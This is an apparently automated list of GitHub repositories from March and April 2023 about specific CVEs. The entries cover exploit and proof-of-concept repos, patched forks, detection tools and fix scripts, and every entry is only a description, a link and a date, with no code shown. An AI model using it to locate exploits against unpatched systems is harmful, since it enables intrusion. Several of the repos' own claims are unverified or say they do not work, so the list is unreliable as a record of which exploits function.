**no description** : [ReachabilityOrg/cve-2022-42889-text4shell-docker](https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker) create time: 2023-04-08T02:47:55Z

**Unauthenticated Remote Code Execution through authentication bypass and command injection in Cacti < 1.2.23 and < 1.3.0** : [JacobEbben/CVE-2022-46169_unauth_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46169_unauth_remote_code_execution) create time: 2023-04-07T23:40:53Z

**CVE-2023-21742 Poc** : [ohnonoyesyes/CVE-2023-21742](https://github.com/ohnonoyesyes/CVE-2023-21742) create time: 2023-04-07T23:46:25Z

**# Fix-CVE-2021-34527 Fix for the security Script Changes ACL in the directory Stop Service PrintSpooler Spooler Changes StartupType to Disabled Add every server in the serverlist.csv and run script.** : [fardinbarashi/PsFix-CVE-2021-34527](https://github.com/fardinbarashi/PsFix-CVE-2021-34527) create time: 2023-04-07T20:14:31Z

**no description** : [timb-machine-mirrors/CVE-2023-29017](https://github.com/timb-machine-mirrors/CVE-2023-29017) create time: 2023-04-07T18:26:25Z

**Exploits and report for CVE-2022-43293** : [LucaBarile/CVE-2022-43293](https://github.com/LucaBarile/CVE-2022-43293) create time: 2023-04-07T13:38:27Z

**Exploit for CVE-2022-0003** : [LucaBarile/CVE-2022-38604](https://github.com/LucaBarile/CVE-2022-38604) create time: 2022-08-02T13:53:18Z

**no description** : [Ravindu-Priyankara/CVE-2017-5487-vulnerability-on-NSBM](https://github.com/Ravindu-Priyankara/CVE-2017-5487-vulnerability-on-NSBM) create time: 2023-04-07T08:10:45Z

**no description** : [jedai47/cve-2018-17182](https://github.com/jedai47/cve-2018-17182) create time: 2023-04-07T10:35:24Z

**no description** : [jedai47/CVE-2018-7273](https://github.com/jedai47/CVE-2018-7273) create time: 2023-04-07T10:25:17Z

**no description** : [jedai47/CVE-2017-16994](https://github.com/jedai47/CVE-2017-16994) create time: 2023-04-07T10:03:49Z

**no description** : [sxsuperxuan/Weblogic_CVE-2023-21389](https://github.com/sxsuperxuan/Weblogic_CVE-2023-21389) create time: 2023-04-07T09:25:09Z

**Checker help to verify created account or find it's mandat** : [qmakake/SAP_CVE-2020-6287_find_mandate](https://github.com/qmakake/SAP_CVE-2020-6287_find_mandate) create time: 2023-04-07T08:24:12Z

**no description** : [DarokNET/CVE-2023-27100](https://github.com/DarokNET/CVE-2023-27100) create time: 2023-04-07T07:38:48Z

**POC,EXP,chatGPT for me,只能给一些思路,全部不可用** : [hktalent/CVE-2022-21306](https://github.com/hktalent/CVE-2022-21306) create time: 2023-04-07T03:59:07Z

**jmreport/qurestSql 未授权SQL注入批量扫描poc** : [MzzdToT/CVE-2023-1454](https://github.com/MzzdToT/CVE-2023-1454) create time: 2023-04-07T03:30:22Z

**POC,EXP, chatGPT for me** : [hktalent/CVE-2023-21837](https://github.com/hktalent/CVE-2023-21837) create time: 2023-04-07T03:18:12Z

**POC,EXP,chatGPT for me** : [hktalent/CVE-2022-45047](https://github.com/hktalent/CVE-2022-45047) create time: 2023-04-07T03:16:47Z

**CVE-2023-27053 - Cross Site Scripting - Router CLARO (HGJ310)** : [d3fudd/XSS-HGJ310](https://github.com/d3fudd/XSS-HGJ310) create time: 2023-02-18T20:05:47Z

**no description** : [himanshu667/kernel_v4.19.72_CVE-2022-42896](https://github.com/himanshu667/kernel_v4.19.72_CVE-2022-42896) create time: 2023-04-06T17:17:25Z

**I Found the reflected xss vulnerability in shopware 5 .for more details check my poc video** : [sahilop123/-CVE-2022-48150](https://github.com/sahilop123/-CVE-2022-48150) create time: 2023-04-06T16:14:42Z

**https://www.cvedetails.com/cve/CVE-2022-34972/** : [DevCyberNico/exploit_-CVE-2022-34972](https://github.com/DevCyberNico/exploit_-CVE-2022-34972) create time: 2023-04-06T14:12:05Z

**no description** : [BaconCriCRi/PoC-CVE-2022-4939-](https://github.com/BaconCriCRi/PoC-CVE-2022-4939-) create time: 2023-04-06T13:34:09Z

**no description** : [hshivhare67/kernel_v4.19.72_CVE-2022-42896_new](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_new) create time: 2023-04-06T12:12:27Z

**no description** : [LHXHL/Minio-CVE-2023-28432](https://github.com/LHXHL/Minio-CVE-2023-28432) create time: 2023-04-06T12:29:31Z

**CVE-2023-23752** : [AkbarWiraN/Joomla-Scanner](https://github.com/AkbarWiraN/Joomla-Scanner) create time: 2023-04-06T12:15:50Z

**no description** : [hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224) create time: 2023-04-06T11:02:47Z

**no description** : [hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347) create time: 2023-04-06T09:54:28Z

**no description** : [qaisarafridi/cve-2021-31290](https://github.com/qaisarafridi/cve-2021-31290) create time: 2023-04-06T07:57:29Z

**no description** : [qaisarafridi/cve-2021-3129](https://github.com/qaisarafridi/cve-2021-3129) create time: 2023-04-06T07:56:33Z

**no description** : [hshivhare67/platform_external_tcpdump_AOSP10_r33_4.9.2-_CVE-2018-14463](https://github.com/hshivhare67/platform_external_tcpdump_AOSP10_r33_4.9.2-_CVE-2018-14463) create time: 2023-04-06T06:58:12Z

**no description** : [hshivhare67/external_expat_v2.2.6_CVE-2021-45960](https://github.com/hshivhare67/external_expat_v2.2.6_CVE-2021-45960) create time: 2023-04-06T06:20:55Z

**no description** : [hshivhare67/external_expat_v2.1.0_CVE-2022-25315](https://github.com/hshivhare67/external_expat_v2.1.0_CVE-2022-25315) create time: 2023-04-06T05:42:39Z

**no description** : [pivik271/CVE-2021-3490](https://github.com/pivik271/CVE-2021-3490) create time: 2023-04-06T03:21:11Z

**CVE-2023-0669 Python PoC** : [Avento/CVE-2023-0669](https://github.com/Avento/CVE-2023-0669) create time: 2023-04-06T03:40:03Z

**no description** : [pivik271/CVE-2021-3490](https://github.com/pivik271/CVE-2021-3490) create time: 2023-04-06T02:46:31Z

**CVE-2023-22809 Linux Sudo** : [CKevens/CVE-2023-22809-sudo-POC](https://github.com/CKevens/CVE-2023-22809-sudo-POC) create time: 2023-04-06T03:11:48Z

**no description** : [hshivhare67/kernel_v4.1.15_CVE-2019-10220](https://github.com/hshivhare67/kernel_v4.1.15_CVE-2019-10220) create time: 2023-04-05T11:51:57Z

**no description** : [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943) create time: 2023-04-05T11:24:29Z

**The first proof of concept of the Contao CMS RCE** : [redteamsecurity2023/CVE-2022-26265](https://github.com/redteamsecurity2023/CVE-2022-26265) create time: 2023-04-05T09:34:29Z

**no description** : [Trinadh465/linux-4.19.72_CVE-2022-42896](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-42896) create time: 2023-04-05T09:10:38Z

**no description** : [hshivhare67/kernel_v4.19.72_CVE-2022-42896](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896) create time: 2023-04-05T07:51:32Z

**no description** : [Trinadh465/kernel_CVE-2022-42896](https://github.com/Trinadh465/kernel_CVE-2022-42896) create time: 2023-04-05T05:36:51Z

**no description** : [hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933](https://github.com/hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933) create time: 2023-04-05T06:04:42Z

**no description** : [Satheesh575555/linux-4.19.72_CVE-2023-28450](https://github.com/Satheesh575555/linux-4.19.72_CVE-2023-28450) create time: 2023-04-05T05:33:09Z

**no description** : [h1bAna/CVE-2023-21768](https://github.com/h1bAna/CVE-2023-21768) create time: 2023-04-05T02:05:17Z

**Poc for CVE-2023-23752** : [adhikara13/CVE-2023-23752](https://github.com/adhikara13/CVE-2023-23752) create time: 2023-04-04T21:14:19Z

**Реализация использования уязвимости Moodle CVE-2014-3544.** : [bezlla/MoodleHack](https://github.com/bezlla/MoodleHack) create time: 2021-11-12T00:17:39Z

**docker for CVE-2022-42889** : [necroteddy/CVE-2022-42889](https://github.com/necroteddy/CVE-2022-42889) create time: 2023-04-04T20:08:08Z

**Zeek detection logic for CVE-2022-30216.** : [corelight/CVE-2022-30216](https://github.com/corelight/CVE-2022-30216) create time: 2022-07-12T16:35:37Z

**CVE-2014-6287** : [randallbanner/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution](https://github.com/randallbanner/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution) create time: 2023-04-04T18:39:30Z

**no description** : [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944) create time: 2023-04-04T12:07:19Z

**no description** : [hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183) create time: 2023-04-04T10:46:05Z

**no description** : [Trinadh465/linux_4.19.72_CVE-2023-42896](https://github.com/Trinadh465/linux_4.19.72_CVE-2023-42896) create time: 2023-04-04T10:11:54Z

**no description** : [hello123body/CVE-2012-2012](https://github.com/hello123body/CVE-2012-2012) create time: 2023-04-04T06:35:51Z

**no description** : [Nivaskumark/external_expat_AOSP10_r33_CVE-2022-43680](https://github.com/Nivaskumark/external_expat_AOSP10_r33_CVE-2022-43680) create time: 2023-04-04T06:31:47Z

**no description** : [MrEmpy/CVE-2006-3392](https://github.com/MrEmpy/CVE-2006-3392) create time: 2023-04-04T01:54:16Z

**WARNING: This is a vulnerable application to test the exploit for the Cacti command injection (CVE-2022-46169). Run it at your own risk!** : [m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application](https://github.com/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application) create time: 2023-04-01T19:20:29Z

**Reflected XSS via AngularJS Sandbox Escape Expressions in IPSwitch WS_FTP Server 8.6.0** : [dievus/CVE-2022-27665](https://github.com/dievus/CVE-2022-27665) create time: 2022-03-23T14:20:58Z

**no description** : [nidhi7598/linux-4.1.15_CVE-2022-42896](https://github.com/nidhi7598/linux-4.1.15_CVE-2022-42896) create time: 2023-04-03T11:30:26Z

**no description** : [Trinadh465/frameworks_base_CVE-2023-20944](https://github.com/Trinadh465/frameworks_base_CVE-2023-20944) create time: 2023-04-03T12:12:17Z

**no description** : [Trinadh465/frameworks_base_CVE-2023-20943](https://github.com/Trinadh465/frameworks_base_CVE-2023-20943) create time: 2023-04-03T11:32:21Z

**my python poc CVE-2023-24774 and CVE-2023-24775 this sqli cve funadmin** : [csffs/CVE-2023-24775-and-CVE-2023-24774](https://github.com/csffs/CVE-2023-24775-and-CVE-2023-24774) create time: 2023-04-03T09:11:04Z

**no description** : [Trinadh465/frameworks_base_CVE-2023-20944](https://github.com/Trinadh465/frameworks_base_CVE-2023-20944) create time: 2023-04-03T07:21:25Z

**no description** : [Trinadh465/frameworks_av_CVE-2023-20933](https://github.com/Trinadh465/frameworks_av_CVE-2023-20933) create time: 2023-04-03T06:41:47Z

**A vulnerable Spring Boot application that uses log4j and is vulnerable to CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105** : [demonrvm/Log4ShellRemediation](https://github.com/demonrvm/Log4ShellRemediation) create time: 2023-04-02T23:03:28Z

**A vulnerable Spring Boot application that uses log4j and is vulnerable to CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.** : [demonrvm/RemediateLog4Shell](https://github.com/demonrvm/RemediateLog4Shell) create time: 2023-04-02T22:03:08Z

**A Spring Boot application that uses log4j 2.14.0 and is vulnerable to Log4Shell. Apply patches 1 at a time to remove CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105** : [demonrvm/RemediateLog4Shell](https://github.com/demonrvm/RemediateLog4Shell) create time: 2023-04-02T18:45:40Z

**Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)** : [keyuan15/CVE-2020-17530](https://github.com/keyuan15/CVE-2020-17530) create time: 2023-04-02T13:20:42Z

**no description** : [7a6163/CVE-2023-28432](https://github.com/7a6163/CVE-2023-28432) create time: 2023-04-02T12:43:26Z

**no description** : [ph4ge/cve-2018-6574](https://github.com/ph4ge/cve-2018-6574) create time: 2023-04-02T12:30:02Z

**A fully functional untethered iOS 16-16-4 jailbreak using the CVE-2023-23531 vulnerability** : [DarthOCE/MonkeyJB](https://github.com/DarthOCE/MonkeyJB) create time: 2023-04-02T01:03:13Z

**no description** : [devAL3X/CVE-2022-46169_poc](https://github.com/devAL3X/CVE-2022-46169_poc) create time: 2023-04-01T22:37:37Z

**no description** : [lionelmusonza/CVE-2023-26866](https://github.com/lionelmusonza/CVE-2023-26866) create time: 2023-04-01T21:19:05Z

**no description** : [protonnegativo/CVE-2010-4180-by-ChatGPT](https://github.com/protonnegativo/CVE-2010-4180-by-ChatGPT) create time: 2023-04-01T13:19:14Z

**BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)** : [kabir0x23/CVE-2022-3552](https://github.com/kabir0x23/CVE-2022-3552) create time: 2023-04-01T11:53:14Z

**no description** : [ChrisPritchard/CVE-2021-22911-rust](https://github.com/ChrisPritchard/CVE-2021-22911-rust) create time: 2023-04-01T07:19:54Z

**A script for exploiting CVE-2022-1227** : [iridium-soda/CVE-2022-1227_Exploit](https://github.com/iridium-soda/CVE-2022-1227_Exploit) create time: 2023-04-01T07:28:15Z

**Updated version of this weak password encryption script** : [s3l33/CVE-2022-25012](https://github.com/s3l33/CVE-2022-25012) create time: 2023-04-01T04:21:18Z

**Web tool for detecting Acropalypse (CVE-2023-21036)** : [lordofpipes/acropadetect](https://github.com/lordofpipes/acropadetect) create time: 2023-04-01T00:08:15Z

**no description** : [g1vi/CVE-2019-15107](https://github.com/g1vi/CVE-2019-15107) create time: 2023-03-31T20:56:39Z

**no description** : [devAL3X/CVE-2022-46169_poc](https://github.com/devAL3X/CVE-2022-46169_poc) create time: 2023-03-31T16:21:20Z

**no description** : [devAL3X/CVE-2022-46169_poc](https://github.com/devAL3X/CVE-2022-46169_poc) create time: 2023-03-31T15:09:00Z

**minio敏感信息泄露** : [Majus527/MinIO_CVE-2023-28432](https://github.com/Majus527/MinIO_CVE-2023-28432) create time: 2023-03-31T13:29:36Z

**no description** : [Trinadh465/linux-4.19.72_CVE-2022-42896](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-42896) create time: 2023-03-31T10:57:06Z

**CVE-2023-23397漏洞的简单PoC,有效载荷通过电子邮件发送。** : [CKevens/CVE-2023-23397-POC](https://github.com/CKevens/CVE-2023-23397-POC) create time: 2023-03-31T03:35:30Z

**no description** : [PyterSmithDarkGhost/EXPLOITIOS16MACOSIPHONE14CVE202323529](https://github.com/PyterSmithDarkGhost/EXPLOITIOS16MACOSIPHONE14CVE202323529) create time: 2023-03-30T14:53:26Z

**ZCBS/ZCBS/ZPBS/ZBBS Reflected XSS** : [bigzooooz/CVE-2023-26692](https://github.com/bigzooooz/CVE-2023-26692) create time: 2023-03-30T13:56:24Z

**Module for PrestaShop 1.7.X to fix CVE-2023-28447 vulnerability (Smarty XSS)** : [drkbcn/lblfixer_cve_2023_28447](https://github.com/drkbcn/lblfixer_cve_2023_28447) create time: 2023-03-30T10:28:20Z

**Just a DoS poc that might become something more** : [Exploitables/CVE-2009-0824](https://github.com/Exploitables/CVE-2009-0824) create time: 2023-03-30T07:11:50Z

**no description** : [0759104103/cd-CVE-2019-11932](https://github.com/0759104103/cd-CVE-2019-11932) create time: 2023-03-29T11:12:36Z

**Full LPE Exploit for CVE-2019-5603 / FreeBSD-SA-19:15.mqueuefs / FreeBSD-SA-19:24.mqueuefs** : [raymontag/CVE-2019-5603](https://github.com/raymontag/CVE-2019-5603) create time: 2023-03-29T09:17:02Z

**Full LPE Exploit for CVE-2019-5596 / FreeBSD-SA-19:02.fd** : [raymontag/CVE-2019-5596](https://github.com/raymontag/CVE-2019-5596) create time: 2023-03-29T09:15:07Z

**PoC for CVE-2022-41876** : [Skileau/CVE-2022-41876](https://github.com/Skileau/CVE-2022-41876) create time: 2023-03-21T17:05:07Z

**CVE-2023-8888.test** : [xiahao90/CVE-2023-8888.test](https://github.com/xiahao90/CVE-2023-8888.test) create time: 2023-03-29T03:56:25Z

**An issue in the password reset function of Peppermint v0.2.4 allows attackers to access the emails and passwords of the Tickets page via a crafted request.** : [bypazs/CVE-2023-26984](https://github.com/bypazs/CVE-2023-26984) create time: 2023-02-26T16:45:50Z

**Trudesk v1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Tags parameter under the Create Ticket function.** : [bypazs/CVE-2023-26982](https://github.com/bypazs/CVE-2023-26982) create time: 2023-02-15T12:49:38Z

**Apache Commons FileUpload 보안 취약점 테스트** : [nice1st/CVE-2023-24998](https://github.com/nice1st/CVE-2023-24998) create time: 2023-03-29T01:36:29Z

**CVE-2023-28432 MinIO敏感信息泄露检测脚本** : [Cuerz/CVE-2023-28432](https://github.com/Cuerz/CVE-2023-28432) create time: 2023-03-29T01:26:30Z

**no description** : [jacquesquail/CVE-2023-23397](https://github.com/jacquesquail/CVE-2023-23397) create time: 2023-03-29T01:17:22Z

**no description** : [mha98/CVE-2022-45003](https://github.com/mha98/CVE-2022-45003) create time: 2023-03-28T18:04:17Z

**no description** : [mha98/CVE-2022-45004](https://github.com/mha98/CVE-2022-45004) create time: 2023-03-28T17:49:59Z

**no description** : [cyberdesu/Remote-Buffer-overflow-CVE-2003-0172](https://github.com/cyberdesu/Remote-Buffer-overflow-CVE-2003-0172) create time: 2023-03-28T13:38:07Z

**CVE-2023-1665 - Twake App** : [0xsu3ks/CVE-2023-1665](https://github.com/0xsu3ks/CVE-2023-1665) create time: 2023-03-28T13:07:34Z

**Unsigned driver loader using CVE-2018-19320** : [zer0condition/GDRVLoader](https://github.com/zer0condition/GDRVLoader) create time: 2022-11-12T05:48:13Z

**exploit for CVE-2023-23397** : [D7-M/CVE-2023-23397-exploit](https://github.com/D7-M/CVE-2023-23397-exploit) create time: 2023-03-28T04:35:16Z

**Authenticated Remote Code Execution by abusing a single quote injection to write to an auth.php file imported by the NagVis component in Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29** : [JacobEbben/CVE-2022-46836_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46836_remote_code_execution) create time: 2023-03-27T22:30:21Z

**EXP for CVE-2023-28434 MinIO unauthorized to RCE** : [AbelChe/evil_minio](https://github.com/AbelChe/evil_minio) create time: 2023-03-27T08:53:04Z

**no description** : [trustcves/CVE-2023-25263](https://github.com/trustcves/CVE-2023-25263) create time: 2023-03-02T07:55:08Z

**no description** : [trustcves/CVE-2023-25262](https://github.com/trustcves/CVE-2023-25262) create time: 2023-03-02T07:54:47Z

**no description** : [trustcves/CVE-2023-25261](https://github.com/trustcves/CVE-2023-25261) create time: 2023-03-02T07:53:41Z

**no description** : [trustcves/CVE-2023-25260](https://github.com/trustcves/CVE-2023-25260) create time: 2023-03-02T07:53:09Z

**no description** : [yuyongxr/minio_cve-2023-28432](https://github.com/yuyongxr/minio_cve-2023-28432) create time: 2023-03-27T07:15:40Z

**通过vulhub的复现过程实现了,基本的批量检测。比较垃圾但是勉强能用** : [steponeerror/Cve-2023-28432-](https://github.com/steponeerror/Cve-2023-28432-) create time: 2023-03-27T07:14:06Z

**no description** : [Eri11/CVEri2023](https://github.com/Eri11/CVEri2023) create time: 2023-03-27T04:44:17Z

**Arbitrary File Disclosure Vulnerability in Icinga Web 2 <2.8.6, <2.9.6, <2.10** : [doosec101/CVE-2022-24716](https://github.com/doosec101/CVE-2022-24716) create time: 2023-03-27T02:22:23Z

**Unauthenticated Arbitrary File Deletion by abusing Livestatus Query Language Injection in CheckMK Checkmk <= 2.1.0p11, Checkmk <= 2.0.0p28, and all versions of Checkmk 1.6.0 (EOL)** : [JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion](https://github.com/JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion) create time: 2023-03-27T02:16:51Z

**This PoC demonstrates the vulnerability described in CVE-2023-28858** : [improbably-you/poc_cve_2023_28858](https://github.com/improbably-you/poc_cve_2023_28858) create time: 2023-03-26T22:03:57Z

**A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.** : [ibrahimzx/CVE-2019-1653](https://github.com/ibrahimzx/CVE-2019-1653) create time: 2023-03-26T16:36:22Z

**Unauthenticated RCE in Open Web Analytics version <1.7.4** : [0xM4hm0ud/CVE-2022-24637](https://github.com/0xM4hm0ud/CVE-2022-24637) create time: 2023-03-26T13:11:50Z

**no description** : [0xNahim/CVE-2023-23752](https://github.com/0xNahim/CVE-2023-23752) create time: 2023-03-26T13:58:14Z

**no description** : [521526/CVE-2019-1006](https://github.com/521526/CVE-2019-1006) create time: 2023-03-26T08:47:39Z

**no description** : [pumpkinpiteam/CVE-2022-24716](https://github.com/pumpkinpiteam/CVE-2022-24716) create time: 2023-03-26T01:03:07Z

**pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)** : [Chocapikk/CVE-2022-31814](https://github.com/Chocapikk/CVE-2022-31814) create time: 2023-03-26T00:18:04Z

**bot to find and delete images affected by CVE-2023-21036** : [schdork/acropolypse-bot](https://github.com/schdork/acropolypse-bot) create time: 2023-03-26T01:32:32Z

**no description** : [0xFTW/CVE-2023-27842](https://github.com/0xFTW/CVE-2023-27842) create time: 2023-03-25T22:25:37Z

**CVE-2023-21036 detection in Go** : [notaSWE/gocropalypse](https://github.com/notaSWE/gocropalypse) create time: 2023-03-25T21:30:57Z

**pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)** : [Chocapikk/CVE-2022-31814](https://github.com/Chocapikk/CVE-2022-31814) create time: 2023-03-25T20:45:41Z

**no description** : [wshepherd0010/CVE-2022-24112-Lab](https://github.com/wshepherd0010/CVE-2022-24112-Lab) create time: 2023-03-25T16:58:36Z

**no description** : [Toxich4/CVE-2022-32199](https://github.com/Toxich4/CVE-2022-32199) create time: 2023-03-25T08:49:58Z

**no description** : [Brandaoo/CVE-2014-6271](https://github.com/Brandaoo/CVE-2014-6271) create time: 2023-03-25T05:32:59Z

**Joomla Unauthorized Access Vulnerability (CVE-2023-23752) Dockerized** : [karthikuj/CVE-2023-23752-Docker](https://github.com/karthikuj/CVE-2023-23752-Docker) create time: 2023-03-25T06:18:46Z

**no description** : [rodrigosilvaluz/CVE_2022_0847](https://github.com/rodrigosilvaluz/CVE_2022_0847) create time: 2023-03-25T03:55:59Z

**a simple tool to detect the exploitation of BlueKeep vulnerability (CVE-2019-0708)** : [tranqtruong/Detect-BlueKeep](https://github.com/tranqtruong/Detect-BlueKeep) create time: 2023-03-25T00:55:58Z

**RSA NetWitness Platform EDR Agent / Incorrect Access Control - Code Execution** : [hyp3rlinx/CVE-2022-47529](https://github.com/hyp3rlinx/CVE-2022-47529) create time: 2023-03-24T22:50:26Z

**A critical buffer underwrite ('buffer underflow') vulnerability in FortiOS & FortiProxy interfaces may allow a remote unauthenticated attacker to execute arbitrary code on the device and take control of the impacted Product...** : [PSIRT-REPO/CVE-2023-25610](https://github.com/PSIRT-REPO/CVE-2023-25610) create time: 2023-03-23T18:39:02Z

**CVE-2023-23397 powershell patch script for Windows 10 and 11** : [Zeppperoni/CVE-2023-23397-Patch](https://github.com/Zeppperoni/CVE-2023-23397-Patch) create time: 2023-03-24T19:54:21Z

**An exploitation demo of Outlook Elevation of Privilege Vulnerability** : [madelynadams9/CVE-2023-23397-Report](https://github.com/madelynadams9/CVE-2023-23397-Report) create time: 2023-03-24T19:47:42Z

**test of exploit for CVE-2023-21716** : [hv0l/CVE-2023-21716_exploit](https://github.com/hv0l/CVE-2023-21716_exploit) create time: 2023-03-24T15:58:25Z

**Joomla! < 4.2.8 - Unauthenticated information disclosure** : [Acceis/exploit-CVE-2023-23752](https://github.com/Acceis/exploit-CVE-2023-23752) create time: 2023-03-24T11:50:16Z

**CVE-2023-28432 POC** : [acheiii/CVE-2023-28432](https://github.com/acheiii/CVE-2023-28432) create time: 2023-03-24T08:27:32Z

**no description** : [Satheesh575555/linux-4.1.15_CVE-2022-45934](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-45934) create time: 2023-03-24T08:16:44Z

**MinIO存在信息泄露漏洞,未经身份认证的远程攻击者通过发送特殊HTTP请求即可获取所有环境变量,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,造成敏感信息泄露,最终可能导致攻击者以管理员身份登录MinIO** : [MzzdToT/CVE-2023-28432](https://github.com/MzzdToT/CVE-2023-28432) create time: 2023-03-24T08:13:34Z

**no description** : [limo520/CVE-2023-20860](https://github.com/limo520/CVE-2023-20860) create time: 2023-03-24T07:23:52Z

**discord bot to find and delete images affected by CVE-2023-21036** : [maddiethecafebabe/discord-acropolypse-bot](https://github.com/maddiethecafebabe/discord-acropolypse-bot) create time: 2023-03-24T02:39:52Z

**no description** : [johnatag/INF8602-CVE-2020-8835](https://github.com/johnatag/INF8602-CVE-2020-8835) create time: 2023-03-20T18:17:40Z

**CVE-2023-28432,minio未授权访问检测工具** : [Okaytc/minio_unauth_check](https://github.com/Okaytc/minio_unauth_check) create time: 2023-03-24T03:15:28Z

**jeecg-boot unauthorized SQL Injection Vulnerability (CVE-2023-1454)** : [gobysec/CVE-2023-1454](https://github.com/gobysec/CVE-2023-1454) create time: 2023-03-24T03:02:33Z

**Exploit for CVE-2023-27532 against Veeam Backup & Replication** : [sfewer-r7/CVE-2023-27532](https://github.com/sfewer-r7/CVE-2023-27532) create time: 2023-03-23T16:08:43Z

**MiniO verify interface sensitive information disclosure vulnerability (CVE-2023-28432)** : [gobysec/CVE-2023-28432](https://github.com/gobysec/CVE-2023-28432) create time: 2023-03-23T16:27:47Z

**CVE-2023-28343 POC exploit** : [superzerosec/CVE-2023-28343](https://github.com/superzerosec/CVE-2023-28343) create time: 2023-03-23T15:19:02Z

**CVE-2023-28434 nuclei templates** : [Mr-xn/CVE-2023-28434](https://github.com/Mr-xn/CVE-2023-28434) create time: 2023-03-23T14:44:24Z

**no description** : [stevesec/CVE-2023-23397](https://github.com/stevesec/CVE-2023-23397) create time: 2023-03-23T13:40:18Z

**CVE-2017-12615的POC/EXP编写过程** : [gk0d/CVE-2017-12615-POC-EXP](https://github.com/gk0d/CVE-2017-12615-POC-EXP) create time: 2023-03-08T14:53:28Z

**POC for Veeam Backup and Replication CVE-2023-27532** : [horizon3ai/CVE-2023-27532](https://github.com/horizon3ai/CVE-2023-27532) create time: 2023-03-18T16:20:53Z

**Yara rule compatible with ClamAV based on expl_outlook_cve_2023_23397yar** : [securiteinfo/expl_outlook_cve_2023_23397_securiteinfo.yar](https://github.com/securiteinfo/expl_outlook_cve_2023_23397_securiteinfo.yar) create time: 2023-03-23T08:26:53Z

**CVE-2022-42475 飞塔RCE漏洞 POC** : [CKevens/CVE-2022-42475-RCE-POC](https://github.com/CKevens/CVE-2022-42475-RCE-POC) create time: 2023-03-23T06:48:14Z

**no description** : [betillogalvanfbc/POC-CVE-2022-44268](https://github.com/betillogalvanfbc/POC-CVE-2022-44268) create time: 2023-03-22T21:26:20Z

**https & http** : [notareaperbutDR34P3r/vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/vuln-CVE-2022-41082) create time: 2023-03-22T20:04:07Z

**Detection an sanitization for Acropalypse Now - CVE-2023-21036** : [infobyte/CVE-2023-21036](https://github.com/infobyte/CVE-2023-21036) create time: 2023-03-22T14:59:42Z

**Python script for sending e-mails with CVE-2023-23397 payload using SMTP** : [BronzeBee/cve-2023-23397](https://github.com/BronzeBee/cve-2023-23397) create time: 2023-03-22T11:00:47Z

**no description** : [X1r0z/CVE-2023-23638](https://github.com/X1r0z/CVE-2023-23638) create time: 2023-03-22T11:23:44Z

**no description** : [pivik271/CVE-2022-1015](https://github.com/pivik271/CVE-2022-1015) create time: 2023-03-22T09:16:58Z

**CVE-2023-21768 Windows 11 22H2 系统本地提权 POC** : [CKevens/CVE-2023-21768-POC](https://github.com/CKevens/CVE-2023-21768-POC) create time: 2023-03-22T07:24:36Z

**no description** : [Mustafa1986/cve-2022-42475-Fortinet](https://github.com/Mustafa1986/cve-2022-42475-Fortinet) create time: 2023-03-22T04:26:22Z

**An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000.** : [Exploitables/CVE-2021-44852](https://github.com/Exploitables/CVE-2021-44852) create time: 2023-03-22T04:11:03Z

**Proof of Concept for CVE-2023-23397 in Python** : [tiepologian/CVE-2023-23397](https://github.com/tiepologian/CVE-2023-23397) create time: 2023-03-21T18:38:00Z

**Altenergy Power System Control Software set_timezone RCE Vulnerability (CVE-2023-28343)** : [gobysec/CVE-2023-28343](https://github.com/gobysec/CVE-2023-28343) create time: 2023-03-21T11:41:36Z

**harbor unauthorized detection** : [404tk/CVE-2022-46463](https://github.com/404tk/CVE-2022-46463) create time: 2023-03-21T10:40:19Z

**no description** : [maldev866/ChExp_CVE-2021-30632](https://github.com/maldev866/ChExp_CVE-2021-30632) create time: 2023-03-21T07:53:43Z

**CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user.** : [G37SYS73M/CVE-2022-46087](https://github.com/G37SYS73M/CVE-2022-46087) create time: 2023-03-21T08:02:48Z

